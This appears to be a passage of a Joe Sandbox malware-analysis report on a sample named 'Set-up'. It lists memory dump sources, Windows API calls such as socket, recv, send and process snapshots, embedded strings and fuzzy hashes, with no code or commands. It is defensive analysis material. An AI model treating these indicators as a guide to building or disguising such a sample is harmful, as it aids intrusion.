                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID: CreateToolhelp32Snapshot failed.$name$pid$processes
                            • API String ID: 420147892-2059488242
                            • Opcode ID: 07e62c9950d7cf714001f1adc33f551358460d513ada2918a678ec6798774f10
                            • Instruction ID: 01c291e2ba71ecd51a333522aaf5311ceac3c502de0eebf5ff567bffa1073f0e
                            • Opcode Fuzzy Hash: 07e62c9950d7cf714001f1adc33f551358460d513ada2918a678ec6798774f10
                            • Instruction Fuzzy Hash: D13193B49093049FCB50EFB8D98969EBBF4FF44344F008969E899A7241E7349A44DF52
                            APIs
                            • recv.WS2_32(?,?,008394BF,?), ref: 008077AE
                            • recv.WS2_32(?,?,008394BF,?), ref: 008077BA
                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 008077F1
                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00807815
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080781D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: recv$__acrt_iob_func_errnofflush
                            • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                            • API String ID: 2542159810-640788491
                            • Opcode ID: 925881820e8ea7c7145ab49db18b67588c69373381860c66f19a4b456f86c497
                            • Instruction ID: 93fbcefc6f98f7fd58310fbc1cd32917dda3056cd6927672b9f027d63cfed3db
                            • Opcode Fuzzy Hash: 925881820e8ea7c7145ab49db18b67588c69373381860c66f19a4b456f86c497
                            • Instruction Fuzzy Hash: 8211C8B4D0C3987FE6109B56AC4DE277BADFB85B68F040568FC04E3291D671AC05CAB2
                            APIs
                            • socket.WS2_32(?,?,?), ref: 00807618
                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00807659
                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 0080767D
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00807685
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: __acrt_iob_func_errnofflushsocket
                            • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                            • API String ID: 166263346-842387772
                            • Opcode ID: 9f3ccb2ae1641033ff95e59bc0a9799a635975cb7744484854eb4c3718d58e3b
                            • Instruction ID: 5b5cb25bbff3c046e65117201989a80abed89f4318ada0eb2a796ba8bc06973d
                            • Opcode Fuzzy Hash: 9f3ccb2ae1641033ff95e59bc0a9799a635975cb7744484854eb4c3718d58e3b
                            • Instruction Fuzzy Hash: 0E11EC75E082516BD6105B6FAC4AE873FA9EF81B34F440564F814E22E1D322D855C7E1
                            APIs
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B8D1E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _errno
                            • String ID: @$Inf$NaN
                            • API String ID: 2918714741-141429178
                            • Opcode ID: 0cc4cfc2cd14c453c8a7e326f0ab0d41fe5411cfe75177c936d441dd197625ae
                            • Instruction ID: b4a5ebd30e8bc48f8af0513810bf0c01023f853f5b941061997c846f11e9dbd0
                            • Opcode Fuzzy Hash: 0cc4cfc2cd14c453c8a7e326f0ab0d41fe5411cfe75177c936d441dd197625ae
                            • Instruction Fuzzy Hash: D9F1BF7060C7958BD721AF24C0807ABBBE1FB85314F158AAEE9DD873E1D7359905CB82
                            APIs
                              • Part of subcall function 008076A0: send.WS2_32(multi.c,?,?,?), ref: 008076DE
                            • WSAGetLastError.WS2_32 ref: 008393C3
                              • Part of subcall function 0081D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,008101B1), ref: 0081D8E2
                            • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0083935C
                            • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00839388
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
                            • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                            • API String ID: 1798382672-2691795271
                            • Opcode ID: 38147a85947304082c02146f0fe166a20997b436dcbc596100d0dfb5dda90479
                            • Instruction ID: 40845b98d1ec8a35b3bad64a753f0456bd5a148e01f4e3ee7237f0da7bc8b1ca
                            • Opcode Fuzzy Hash: 38147a85947304082c02146f0fe166a20997b436dcbc596100d0dfb5dda90479
                            • Instruction Fuzzy Hash: 8A51AF74A00305AFD710DF28C881FAAB7A5FF84314F148529FD98DB292E771E991CB91
                            APIs
                            • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00D12D2D,00000000,00000000,?,?,?,008C9882,?,00000000), ref: 008C77DD
                            • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 008C77F0
                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 008C7802
                            • GetLastError.KERNEL32(?,00000000), ref: 008C780E
                            • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 008C7830
                            • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 008C7843
                            • fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008C786B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: fseek$ErrorLastfclosefopenfreadftell
                            • String ID:
                            • API String ID: 1915723720-0
                            • Opcode ID: 2f5392a0e399a5b695534b22747c2823886f6f579de24490891aeed1d2e7087d
                            • Instruction ID: 9a8d21b0d2d7a63c8f57e1a8393bb4d0e42539ea0cce44901e89819ddd5d86b2
                            • Opcode Fuzzy Hash: 2f5392a0e399a5b695534b22747c2823886f6f579de24490891aeed1d2e7087d
                            • Instruction Fuzzy Hash: 0111DAE1E0530427EB2135216C4AF7B3598EB503A5F14043CFE06D6282F935D804CAB6
                            APIs
                            • getsockname.WS2_32(?,?,00000080), ref: 0083A1C6
                            • WSAGetLastError.WS2_32 ref: 0083A1D0
                              • Part of subcall function 0081D090: GetLastError.KERNEL32 ref: 0081D0A1
                              • Part of subcall function 0081D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D0A9
                              • Part of subcall function 0081D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D0CD
                              • Part of subcall function 0081D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D0D7
                              • Part of subcall function 0081D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0081D381
                              • Part of subcall function 0081D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0081D3A2
                              • Part of subcall function 0081D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0081D3BF
                              • Part of subcall function 0081D090: GetLastError.KERNEL32 ref: 0081D3C9
                              • Part of subcall function 0081D090: SetLastError.KERNEL32(00000000), ref: 0081D3D4
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A21C
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0083A220
                            Strings
                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0083A23B
                            • getsockname() failed with errno %d: %s, xrefs: 0083A1F0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                            • API String ID: 2076026050-2605427207
                            • Opcode ID: 32dd88c1209b690b9ef470a03ee3443455e972213c30c5c8fe6ead3e93f4abd0
                            • Instruction ID: 6ddee2add9af4640cb60605de973619a9dec671822eed2429d7a8b15049c9510
                            • Opcode Fuzzy Hash: 32dd88c1209b690b9ef470a03ee3443455e972213c30c5c8fe6ead3e93f4abd0
                            • Instruction Fuzzy Hash: BD21E671808684AAF7259B19DC46FE773BCFF85328F040254F98893151FA32598A86E3
                            APIs
                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00803BA6,?,00E3D044,00801BD2), ref: 008073A6
                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00803BA6,?,00E3D044,00801BD2), ref: 008073CA
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00803BA6,?,00E3D044,00801BD2), ref: 008073D2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: __acrt_iob_func_errnofflush
                            • String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
                            • API String ID: 4185500129-1340350808
                            • Opcode ID: f80031bc5e7cc18e810eb0c8c9340430d35c3dba3cfe04bd8c3b577aa69ad410
                            • Instruction ID: 429b7845eb4851b8840320d31b8e79e061f1c380fdcf4e6b808bead48feaeeee
                            • Opcode Fuzzy Hash: f80031bc5e7cc18e810eb0c8c9340430d35c3dba3cfe04bd8c3b577aa69ad410
                            • Instruction Fuzzy Hash: E421D171A08355AFE7209F56EC4AE177BA9FF85B54F45042CFC49E3391E231E804CAA2
                            APIs
                            • WSAStartup.WS2_32(00000202), ref: 0081D65A
                              • Part of subcall function 0081D690: GetModuleHandleA.KERNEL32(kernel32,00000000,?,?,?,0081D5FA,iphlpapi.dll), ref: 0081D699
                              • Part of subcall function 0081D690: GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 0081D6B5
                              • Part of subcall function 0081D690: strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,00CEE914,?,?,0081D5FA,iphlpapi.dll), ref: 0081D6C3
                            • GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 0081D60C
                            • QueryPerformanceFrequency.KERNEL32(00E3D070), ref: 0081D643
                            • WSACleanup.WS2_32 ref: 0081D67C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartupstrpbrk
                            • String ID: if_nametoindex$iphlpapi.dll
                            • API String ID: 3452087986-3097795196
                            • Opcode ID: a239e3a70340d526aa90f3a6d009dfcc090222a3c1207023168c35966fc19a28
                            • Instruction ID: 6eb0c745601ffb84cd52c3db4442774f3cf0e9db1058cdbf9a8063deb8f7f788
                            • Opcode Fuzzy Hash: a239e3a70340d526aa90f3a6d009dfcc090222a3c1207023168c35966fc19a28
                            • Instruction Fuzzy Hash: 7001D4A49043804FEB116B3AAD1F3A53AA8FF61340F450568E849D61E2F738C4DDC692
                            APIs
                            • htonl.WS2_32(7F000001), ref: 008B4A21
                            • gethostname.WS2_32(00000000,00000040), ref: 008B4AA4
                            • WSAGetLastError.WS2_32 ref: 008B4AB3
                            • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002E), ref: 008B4B3F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ErrorLastgethostnamehtonlstrchr
                            • String ID:
                            • API String ID: 655544046-0
                            • Opcode ID: 6fea0d3f0ca9c1235220dd85b8ab0bbe8cb8ac7090ee94b6b014d3334f850064
                            • Instruction ID: 663fe980e88771bcb660a073b95b514b0d4e89c0b8645a13ee2451297834805a
                            • Opcode Fuzzy Hash: 6fea0d3f0ca9c1235220dd85b8ab0bbe8cb8ac7090ee94b6b014d3334f850064
                            • Instruction Fuzzy Hash: 85519E706047009FE7309B69DD4A7A77AE4FF01329F54283CEA8AD67A2E775E844C702
                            APIs
                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00C975AD), ref: 00C974D8
                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00C975AD), ref: 00C974F4
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00C975AD), ref: 00C9755F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: calloc$free
                            • String ID:
                            • API String ID: 171065143-3916222277
                            • Opcode ID: 8c93d451c77fd82926192361eb0603375b0bdb2ce13f151f64dd1325de13573f
                            • Instruction ID: 77cca8d70bd908c633b8f2f4843e937a41600302846367e0ffe17a811e8675ad
                            • Opcode Fuzzy Hash: 8c93d451c77fd82926192361eb0603375b0bdb2ce13f151f64dd1325de13573f
                            • Instruction Fuzzy Hash: E21170B15097018FCB20EF28C88465ABBE0FF55314F564BACD4A99B391D730DA05CF91
                            APIs
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008012EB
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00801323
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0080132E
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00801344
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
